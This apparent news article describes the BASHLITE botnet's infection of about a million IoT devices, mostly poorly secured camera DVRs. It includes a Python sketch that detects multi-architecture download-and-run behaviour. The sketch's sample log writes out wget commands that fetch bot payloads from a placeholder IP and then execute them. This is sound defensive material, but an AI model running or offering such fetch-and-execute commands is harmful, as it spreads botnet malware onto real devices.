Security researchers have uncovered a massive security breach of around one million IoT (Internet of Things) and other network-connected devices around the world. The attack was carried out by a family of malware known as BASHLITE.
BASHLITE Has Been Unleashed Against a Million Devices
Experts from the Level 3 Threat Research Labs have uncovered a small malware family known as BASHLITE that is behind a huge botnet attack that infiltrated about a million devices. The threat is also known as Lizkebab, Torlus, and Gafgyt.
The malware is tied to a very organized structure of botnets that act against various types of appliances connected to the Internet. BASHLITE is responsible for controlling a lot of malicious C&C servers that serve commands to an increasing number of botnets.
The security experts suggest that hacking groups such as Lizard Squad and Poodle Corp are behind the malware. Their attacks are mainly against IoT devices. Once infected, the devices are used for conducting and leasing distributed denial of service (DDoS) attacks.
Upon successful infiltration, the malware executes the wget command to retrieve the DDoS bot payload. Multiple versions are downloaded to the system and executed to uncover which one works for the target architecture.
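A detection sketch for the download-and-try behaviour described above, added here as an illustration and not taken from the Level 3 research: it flags a host where several files fetched with wget are each executed within a short window. The log format, thresholds, host names, addresses and file names are assumptions constructed for the example.

```python
import posixpath
import shlex
from collections import defaultdict
from urllib.parse import urlparse

WINDOW = 120      # max seconds spanned by the executions (assumed threshold)
MIN_VARIANTS = 3  # distinct fetched files that were then run (assumed threshold)
# Constructed events, "<epoch> <host> <command line>"; names and IPs are made up.
SAMPLE_LOG = """\
1000 cam-dvr-01 wget http://192.0.2.10/bot.arm -O /tmp/bot.arm
1002 cam-dvr-01 /tmp/bot.arm
1003 cam-dvr-01 wget http://192.0.2.10/bot.mips -O /tmp/bot.mips
1005 cam-dvr-01 /tmp/bot.mips
1006 cam-dvr-01 wget http://192.0.2.10/bot.x86 -O /tmp/bot.x86
1008 cam-dvr-01 /tmp/bot.x86
3000 web-01 wget http://198.51.100.7/agent-installer -O /opt/agent-installer
3004 web-01 /opt/agent-installer
"""

def wget_target(argv):
    """Return the base name of the file a wget call writes, else None."""
    if not argv or posixpath.basename(argv[0]) != "wget":
        return None
    out = url = None
    args = iter(argv[1:])
    for arg in args:
        if arg in ("-O", "--output-document"):
            out = next(args, None)
        elif not arg.startswith("-"):
            url = arg
    name = out or (urlparse(url).path if url else "")
    return posixpath.basename(name) or None

def find_multi_variant_droppers(log_text):
    """Map host -> files fetched by wget and then executed in a tight burst."""
    fetched, executed = defaultdict(dict), defaultdict(dict)
    for ts, host, cmd in (l.split(None, 2) for l in log_text.splitlines()):
        argv = shlex.split(cmd)
        name, prog = wget_target(argv), posixpath.basename(argv[0])
        if name:
            fetched[host][name] = int(ts)
        elif prog in fetched[host]:
            executed[host].setdefault(prog, int(ts))
    alerts = {}
    for host, runs in executed.items():
        t = sorted(runs.values())
        if any(b - a <= WINDOW for a, b in zip(t, t[MIN_VARIANTS - 1:])):
            alerts[host] = sorted(runs, key=runs.get)
    return alerts
```

A single fetched installer that is run once, as on the constructed `web-01` host, stays below the threshold and is not reported.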
The known statistics indicate that 96% of the infected devices are in fact IoT (Internet of Things) appliances, 4% are home routers, and less than 1% are Linux servers.
The majority of victims are located in Brazil, Taiwan, and Colombia. A major target is security camera DVRs as their default security settings are easy to compromise. They use simple administrative credentials and provide remote access options.
All affected devices run the Linux operating system, which makes it easy for the attackers to compile cross-platform versions of the malware.
The massive BASHLITE botnet is yet another warning to IoT creators and users. Make sure that your appliance is secure before allowing it Internet access.